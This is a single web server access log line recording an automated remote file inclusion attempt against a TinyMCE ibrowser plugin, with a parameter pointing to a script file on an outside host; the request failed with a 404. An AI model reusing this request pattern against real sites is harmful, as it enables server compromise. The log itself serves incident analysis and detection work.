121.124.127.40 - - [10/Nov/2008:09:35:03 -0800] "GET /logs//tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
